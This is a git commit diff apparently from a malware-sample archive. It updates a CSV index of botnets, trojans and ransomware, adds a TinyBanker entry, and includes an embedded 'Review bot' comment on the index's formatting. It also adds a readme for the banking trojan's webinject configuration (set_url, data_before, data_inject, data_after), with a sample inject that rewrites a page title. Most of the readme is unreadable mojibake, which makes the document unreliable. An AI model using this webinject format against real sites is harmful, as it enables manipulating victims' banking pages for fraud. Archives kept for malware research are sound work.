tiny_banker

thanks to Shahak
Yuval Nativ
2014-09-30 16:43:17 +03:00
parent 914c35feaa
commit 60bfc88720
205 changed files with 23133 additions and 10 deletions


@@ -1,17 +1,17 @@
1,Source/Original/Dokan_Dec2008/Dokan_Dec2008,botnet,Dokan,unknown,unknown,c,00/12/2008,x86,win32,0
3,Source/Original/ShadowBotv3_March2007/ShadowBotv3_March2007,botnet,ShadowBot,3,unknown,cpp,03/2007,x86,win32,0
3,Source/Original/ShadowBotv3_March2007/ShadowBotv3_March2007,botnet,ShadowBot,3,unknown,cpp,Mar-07,x86,win32,0
4,Source/Original/rBot0.3.3_May2004/rBot0.3.3_May2004,botnet,rBot,0.3.3,unknown,cpp,00/05/2004,x86,win32,0
5,Source/Original/ZeuS2.0.8.9_Feb2013/ZeuS2.0.8.9_Feb2013,botnet,ZeuS,2.0.8.9,unknown,c,02/2013,x86,win32,1
5,Source/Original/ZeuS2.0.8.9_Feb2013/ZeuS2.0.8.9_Feb2013,botnet,ZeuS,2.0.8.9,unknown,c,Feb-13,x86,win32,1
6,Source/Original/X0R-USB_Jan2009/X0R-USB_Jan2009,virus,X0R-USB-Virus,unknown,unknown,c,00/01/2009,x86,win32,0
7,Source/Original/LoexBot1.3_Sep2008/LoexBot1.3_Sep2008,botnet,LoexBot,1.3,unknown,cpp,00/09/2008,x86,win32,0
8,Source/Original/ZunkerBot1.4.5_Sep2007/ZunkerBot1.4.5_Sep2007,botnet,ZunkerBot,1.4.5,unknown,php,09/2007,x86,win32,0
8,Source/Original/ZunkerBot1.4.5_Sep2007/ZunkerBot1.4.5_Sep2007,botnet,ZunkerBot,1.4.5,unknown,php,Sep-07,x86,win32,0
9,Source/Original/DopeBotv0.22_UnCrippled_Feb2007/DopeBotv0.22_UnCrippled_Feb2007,botnet,DopeBot-UnCrippled,0.22,unknown,cpp,00/02/2007,x86,win32,0
10,Source/Original/vbBot_Jan2007/vbBot_Jan2007,botnet,vbBot,unknown,unknown,vb,01/2007,x86,win32,0
11,Source/Original/xTBot0.0.2_2Feb2002/xTBot0.0.2_2Feb2002,botnet,xTBot,0.0.2,unknown,cpp,02/2002,x86,win32,0
10,Source/Original/vbBot_Jan2007/vbBot_Jan2007,botnet,vbBot,unknown,unknown,vb,Jan-07,x86,win32,0
11,Source/Original/xTBot0.0.2_2Feb2002/xTBot0.0.2_2Feb2002,botnet,xTBot,0.0.2,unknown,cpp,Feb-02,x86,win32,0
12,Source/Original/VBS.Win32.Vabian/VBS.Win32.Vabian,VBS-Worm,VBS.Win32.Vabian,botnet,unknown,vb,unknown,x86,win32,0
13,Source/Original/DopeBotv0.22_CrippledFeb2007/DopeBotv0.22_CrippledFeb2007,botnet,DopeBot-Crippled,0.22,unknown,cpp,00/02/2007,x86,win32,0
14,Source/Original/Win32.MiniPig_Nov2006/Win32.MiniPig_Nov2006,Worm,Win32.MiniPig,virus,unknown,c,00/11/2006,x86,win32,0
15,Source/Original/HellBotv3.0_10June2005/HellBotv3.0_10June2005,botnet,Hellbot,3.0,unknown,cpp,00/06/2005,x86,win32,0
15,Source/Original/HellBotv3.0_10June2005/HellBotv3.0_10June2005,botnet,Hellbot,3,unknown,cpp,00/06/2005,x86,win32,0
16,Source/Original/Win32.ogw0rm_Nov2008/Win32.ogw0rm_Nov2008,Worm,Win32.ogwOrm,unknown,unknown,cpp,00/11/2008,x86,win32,0
17,Source/Original/DopeBot.B_Dec2004/DopeBot.B_Dec2004,botnet,DopeBot.B,unknown,unknown,cpp,00/12/2004,x86,win32,0
18,Source/Original/LiquidBot_May2005/LiquidBot_May2005,botnet,LiquidBot,unknown,unknown,cpp,00/05/2005,x86,win32,0
@@ -28,11 +28,11 @@
29,Binaries/Trojan.Dropper.Gen/Trojan.Dropper.Gen,trojan,Dropper,Unknown,Unknown,bin,00/01/2014,x86,win32,0
30,Binaries/Trojan.NSIS.Win32/Trojan.NSIS.Win32,trojan,NSIS,Unknown,Unknown,bin,00/01/2014,x86,win32,0
31,Binaries/Trojan.Win32.Bechiro.BCD/Trojan.Win32.Bechiro.BCD,trojan,Bechiro,BCD,Unknown,bin,00/01/2014,x86,win32,0
32,Binaries/AndroRat_6Dec2013/AndroRat_6Dec2013,botnet,AndroRat,Dec2013,Unknown,java,06/12/2013,x86,win32,0
33,Binaries/CryptoLocker_22Jan2014/CryptoLocker_22Jan2014,ransomeware,CryptoLocker,Jan2014,Unknown,bin,22/01/2014,x86,win32,1
32,Binaries/AndroRat_6Dec2013/AndroRat_6Dec2013,botnet,AndroRat,Dec-13,Unknown,java,06/12/2013,x86,win32,0
33,Binaries/CryptoLocker_22Jan2014/CryptoLocker_22Jan2014,ransomeware,CryptoLocker,Jan-14,Unknown,bin,22/01/2014,x86,win32,1
34,Binaries/njRAT-v0.6.4/njRAT-v0.6.4,botnet,njRAT,0.6.4,Unknown,bin,00/09/2013,x86,win32,0
35,Binaries/ZeusBankingVersion_26Nov2013/ZeusBankingVersion_26Nov2013,botnet,Zeus - zBot,Nov2013,Unknown,bin,23/11/2013,x86,win32,1
36,Source/Original/NullBot_Dec2006/NullBot_Dec2006,botnet,NullBot,Dec2006,Unknown,cpp,00/12/2006,x86,win32,0
35,Binaries/ZeusBankingVersion_26Nov2013/ZeusBankingVersion_26Nov2013,botnet,Zeus - zBot,Nov-13,Unknown,bin,23/11/2013,x86,win32,1
36,Source/Original/NullBot_Dec2006/NullBot_Dec2006,botnet,NullBot,Dec-06,Unknown,cpp,00/12/2006,x86,win32,0
37,Binaries/Artemis,trojan,Artemis,Unknown,Unknown,bin,00/00/0000,x86,win32,0
38,Binaries/Somoto,apt,Somoto,unknown,unknown,bin,00/00/0000,x86,win32,0
39,Binaries/Variant.Kazy,trojan,Variant.Kazy,unknown,unknown,bin,00/00/0000,x86,win32,0
@@ -59,3 +59,4 @@
60,Binaries/SpyEye,botnet,SpyEye,Unknown,Unknown,bin,23/06/2014,x86,win32,0
61,Binaries/Powerliks,botnet,Powerliks,Unknown,Unknown,bin,09/08/2014,x86,win32,1
62,Binaries/ZeroLocker,ransomware,Zerolocker,A,Unknown,bin,09/08/2014,x86,win32,0
63,Sources/Original/TinyBanker_Jan2012,botnet,Tiny Banker,A,Russia,asm,00/01/2012,x86,win32,0
1 1 Source/Original/Dokan_Dec2008/Dokan_Dec2008 botnet Dokan unknown unknown c 00/12/2008 x86 win32 0
2 3 Source/Original/ShadowBotv3_March2007/ShadowBotv3_March2007 botnet ShadowBot 3 unknown cpp 03/2007 Mar-07 x86 win32 0
3 4 Source/Original/rBot0.3.3_May2004/rBot0.3.3_May2004 botnet rBot 0.3.3 unknown cpp 00/05/2004 x86 win32 0
4 5 Source/Original/ZeuS2.0.8.9_Feb2013/ZeuS2.0.8.9_Feb2013 botnet ZeuS 2.0.8.9 unknown c 02/2013 Feb-13 x86 win32 1
5 6 Source/Original/X0R-USB_Jan2009/X0R-USB_Jan2009 virus X0R-USB-Virus unknown unknown c 00/01/2009 x86 win32 0
6 7 Source/Original/LoexBot1.3_Sep2008/LoexBot1.3_Sep2008 botnet LoexBot 1.3 unknown cpp 00/09/2008 x86 win32 0
7 8 Source/Original/ZunkerBot1.4.5_Sep2007/ZunkerBot1.4.5_Sep2007 botnet ZunkerBot 1.4.5 unknown php 09/2007 Sep-07 x86 win32 0
8 9 Source/Original/DopeBotv0.22_UnCrippled_Feb2007/DopeBotv0.22_UnCrippled_Feb2007 botnet DopeBot-UnCrippled 0.22 unknown cpp 00/02/2007 x86 win32 0
9 10 Source/Original/vbBot_Jan2007/vbBot_Jan2007 botnet vbBot unknown unknown vb 01/2007 Jan-07 x86 win32 0
10 11 Source/Original/xTBot0.0.2_2Feb2002/xTBot0.0.2_2Feb2002 botnet xTBot 0.0.2 unknown cpp 02/2002 Feb-02 x86 win32 0
11 12 Source/Original/VBS.Win32.Vabian/VBS.Win32.Vabian VBS-Worm VBS.Win32.Vabian botnet unknown vb unknown x86 win32 0
12 13 Source/Original/DopeBotv0.22_CrippledFeb2007/DopeBotv0.22_CrippledFeb2007 botnet DopeBot-Crippled 0.22 unknown cpp 00/02/2007 x86 win32 0
13 14 Source/Original/Win32.MiniPig_Nov2006/Win32.MiniPig_Nov2006 Worm Win32.MiniPig virus unknown c 00/11/2006 x86 win32 0
14 15 Source/Original/HellBotv3.0_10June2005/HellBotv3.0_10June2005 botnet Hellbot 3.0 3 unknown cpp 00/06/2005 x86 win32 0
15 16 Source/Original/Win32.ogw0rm_Nov2008/Win32.ogw0rm_Nov2008 Worm Win32.ogwOrm unknown unknown cpp 00/11/2008 x86 win32 0
16 17 Source/Original/DopeBot.B_Dec2004/DopeBot.B_Dec2004 botnet DopeBot.B unknown unknown cpp 00/12/2004 x86 win32 0
17 18 Source/Original/LiquidBot_May2005/LiquidBot_May2005 botnet LiquidBot unknown unknown cpp 00/05/2005 x86 win32 0
28 29 Binaries/Trojan.Dropper.Gen/Trojan.Dropper.Gen trojan Dropper Unknown Unknown bin 00/01/2014 x86 win32 0
29 30 Binaries/Trojan.NSIS.Win32/Trojan.NSIS.Win32 trojan NSIS Unknown Unknown bin 00/01/2014 x86 win32 0
30 31 Binaries/Trojan.Win32.Bechiro.BCD/Trojan.Win32.Bechiro.BCD trojan Bechiro BCD Unknown bin 00/01/2014 x86 win32 0
31 32 Binaries/AndroRat_6Dec2013/AndroRat_6Dec2013 botnet AndroRat Dec2013 Dec-13 Unknown java 06/12/2013 x86 win32 0
32 33 Binaries/CryptoLocker_22Jan2014/CryptoLocker_22Jan2014 ransomeware CryptoLocker Jan2014 Jan-14 Unknown bin 22/01/2014 x86 win32 1
33 34 Binaries/njRAT-v0.6.4/njRAT-v0.6.4 botnet njRAT 0.6.4 Unknown bin 00/09/2013 x86 win32 0
34 35 Binaries/ZeusBankingVersion_26Nov2013/ZeusBankingVersion_26Nov2013 botnet Zeus - zBot Nov2013 Nov-13 Unknown bin 23/11/2013 x86 win32 1
35 36 Source/Original/NullBot_Dec2006/NullBot_Dec2006 botnet NullBot Dec2006 Dec-06 Unknown cpp 00/12/2006 x86 win32 0
36 37 Binaries/Artemis trojan Artemis Unknown Unknown bin 00/00/0000 x86 win32 0
37 38 Binaries/Somoto apt Somoto unknown unknown bin 00/00/0000 x86 win32 0
38 39 Binaries/Variant.Kazy trojan Variant.Kazy unknown unknown bin 00/00/0000 x86 win32 0
59 60 Binaries/SpyEye botnet SpyEye Unknown Unknown bin 23/06/2014 x86 win32 0
60 61 Binaries/Powerliks botnet Powerliks Unknown Unknown bin 09/08/2014 x86 win32 1
61 62 Binaries/ZeroLocker ransomware Zerolocker A Unknown bin 09/08/2014 x86 win32 0
62 63 Sources/Original/TinyBanker_Jan2012 botnet Tiny Banker A Russia asm 00/01/2012 x86 win32 0
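Review bot: The row added for TinyBanker (`63,Sources/Original/TinyBanker_Jan2012,...`, the single addition under the `@@ -59,3 +59,4 @@` header) uses the path prefix `Sources/Original/` while every other source row in this index uses `Source/Original/`, so anything that resolves the second column to a directory will miss this entry; unless the sample really was committed under `Sources/`, the row should read `63,Source/Original/TinyBanker_Jan2012,botnet,Tiny Banker,A,Russia,asm,00/01/2012,x86,win32,0`. The other Source rows also repeat the directory name as a trailing component (`.../ZeroLocker` style rows under Binaries do not), so it is worth confirming which shape the consumers of this file expect. Separately, the first two hunks now hold both `Mar-07`/`Feb-13`/`Dec-13` and `00/05/2004`-style values in the same date and version columns, and `Hellbot` goes from `3.0` to `3`; the `Mon-YY` and dropped-`.0` forms look like a spreadsheet auto-format round-trip rather than a deliberate scheme, and a single format per column is what a parser of this index needs. This render carries no `+`/`-` markers, so which side holds the `Mon-YY` values is inferred from the commit order, not certain.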


@@ -0,0 +1,215 @@
08.04.12
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> set_url (<28><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>) <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 2 <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> URL <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>. <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> set_url <20> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:
G - <20><><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> GET <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> URL
P - <20><><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> POST <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> URL
L - <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><> <20><><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD>
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>:
* - <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
# - <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> #
? - <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<09><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> set_url <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>. <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> set_url <20><><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>.
<EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>: data_before, data_inject, data_after.
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> data_end <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>. <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:
data_before - <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
data_after - <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
data_inject - <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>.
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> #1. <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:
set_url http://ya.ru/ gp
data_before
<title>
data_end
data_inject
New Title
data_end
data_after
</title>
data_end
<EFBFBD><EFBFBD><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> http://ya.ru/ <20><><EFBFBD> GET <20> POST <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> New Title <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <title> <20> </title>. <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.
